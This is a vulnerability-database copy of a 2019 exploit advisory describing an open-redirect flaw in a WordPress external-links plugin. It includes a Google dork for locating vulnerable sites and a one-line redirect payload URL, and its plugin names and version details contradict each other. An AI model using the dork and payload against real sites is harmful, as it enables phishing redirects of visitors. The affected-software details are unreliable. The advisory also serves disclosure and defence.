Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKingSkrupellosPACKETSTORM:151679
HistoryFeb 14, 2019 - 12:00 a.m.

WordPress WP-JS-External-Link-Info 2.2.0 Open Redirection

2019-02-1400:00:00
KingSkrupellos
packetstormsecurity.com
68
JSON
`####################################################################  
  
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 14/02/2019  
# Vendor Homepage : finewebdev.com  
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip  
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip  
# Software Information Link : wordpress.org/plugins/wp-external-links/  
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''  
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
WP External Links (nofollow new tab seo) is open source software.  
  
Manage external and internal links on your site.  
  
####################################################################  
  
# Impact :  
***********  
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability   
  
because the application fails to properly verify user-supplied input.   
  
Exploiting this issue may allow attackers to redirect users to arbitrary web sites   
  
and conduct phishing attacks; other attacks are also possible.   
  
WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is   
  
vulnerable; prior versions may also be affected.  
  
####################################################################  
  
# Open Redirection Exploit :  
*************************  
  
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
JSON